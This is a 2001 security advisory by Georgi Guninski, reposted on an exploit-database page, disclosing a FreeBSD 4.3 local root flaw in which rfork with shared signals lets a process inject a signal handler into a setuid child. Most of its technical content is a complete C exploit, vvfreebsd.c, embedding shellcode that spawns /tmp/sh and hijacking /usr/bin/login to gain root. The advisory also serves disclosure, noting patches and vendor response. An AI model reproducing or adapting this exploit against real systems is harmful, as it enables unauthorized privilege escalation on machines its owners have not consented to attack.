Lucene search
K

vvfreebsd.txt

🗓️ 12 Jul 2001 00:00:00Reported by Georgi GuninskiType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 34 Views

Local root compromise in FreeBSD 4.3 due to signal handler injection vulnerability.

Code
` Georgi Guninski security advisory #48, 2001  
  
FreeBSD 4.3 local root, yet Linux and *BSD much better than Windows  
  
Systems affected:  
FreeBSD 4.3 and probably earlier versions.  
  
Risk: High  
Date: 10 July 2001  
  
Legal Notice:  
This Advisory is Copyright (c) 2001 Georgi Guninski.  
You may distribute it unmodified.  
You may not modify it and distribute it or distribute parts  
of it without the author's written permission.  
  
Disclaimer:  
The information in this advisory is believed to be true based on  
experiments though it may be false.  
The opinions expressed in this advisory and program are my own and  
not of any company. The usual standard disclaimer applies,  
especially the fact that Georgi Guninski is not liable for any damages  
caused by direct or indirect use of the information or functionality  
provided by this advisory or program. Georgi Guninski bears no  
responsibility for content or misuse of this advisory or program or  
any derivatives thereof.  
  
Description:  
  
There is local root compromise in FreeBSD 4.3 due to design flaw  
which allows injecting signal handlers in other processes.  
  
Details:  
The problem is rfork(RFPROC|RFSIGSHARE) which shares the signal  
handlers.  
If the child does exec() on a setuid program and then the parent set a  
signal handler, the signal handler is replicated in the child.  
The address of the signal handler may be in the environment and after  
sending  
a signal to the child our signal handler gets executed.  
Examine the code for more information.  
  
Exploit:  
  
Examine the source and don't send me mail if you get SEGV.  
http://www.guninski.com/vvfreebsd.c  
  
-------------vvfreebsd.c----------------------  
  
/*  
FreeBSD 4.3 local root exploit using shared signals.  
Written by Georgi Guninski http://www.guninski.com  
*/  
  
#include <stdio.h>  
#include <signal.h>  
#include <unistd.h>  
int vv1;  
  
#define MYSIG SIGINT  
  
//exec "/tmp/sh", shellcode gotten from the internet and modified  
unsigned char bsdshell[] = "\x90\x90\x90\x90\x90\x90\x90\x90"  
"\x31\xc0\x50\x50\xb0\xb7\xcd\x80"  
"\x31\xc0\x50\x50\xb0\x17\xcd\x80"  
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"  
"\x74\x6d\x70\x89\xe3\x50\x53\x50\x54\x53"  
"\xb0\x3b\x50\xcd\x80\x90\x90\x90";  
  
typedef (*PROG)();  
extern char **environ;  
  
int main(int ac,char **av)  
{  
int pid;  
//(*(PROG)bsdshell)();  
if(!(vv1=getenv("vv")))  
{  
setenv("vv",bsdshell,1);  
if(!execle(av[0],"vv",NULL,environ))  
{  
perror("weird exec");  
exit(1);  
}  
}  
  
printf("vvfreebsd. Written by Georgi Guninski\n");  
printf("shall jump to %x\n",vv1);  
  
if(!(pid=rfork(RFPROC|RFSIGSHARE)))  
{  
printf("child=%d\n",getpid());  
// /usr/bin/login and rlogin work for me. ping gives nonsuid shell  
// if(!execl("/usr/bin/rlogin","rlogin","localhost",0))  
if(!execl("/usr/bin/login","login",0))  
{  
perror("exec setuid failed");  
exit(2);  
};  
}  
sleep(2);  
signal(MYSIG,(sig_t)vv1);  
sleep(2);  
kill(pid,MYSIG);  
printf("done\n");  
while(42);  
}  
  
Workaround/Soltution:  
As far as I know patches for this problem are commited for both  
-current and -stable.  
From "CVS log for src/sys/kern/kern_exec.c"  
[MFC: do not share sigs after an exec]  
The main diff seems to be at:  
http://www.freebsd.org/cgi/cvsweb.cgi/src/sys/kern/kern_exec.c.diff?r1=1  
.107.2.7&r2=1.107.2.8&f=h  
  
Vendor status:  
FreeBSD was informed on 2 July 2001 (sent them broken attachment on 1  
July).  
  
Some comparison of vendor response times from my personal experience:  
FreeBSD seem to have fixed this in 7 days.  
OpenBSD fixed my previous advisory in 6 days.  
Microsoft are much slower.  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

12 Jul 2001 00:00Current
7.4High risk
Vulners AI Score7.4
34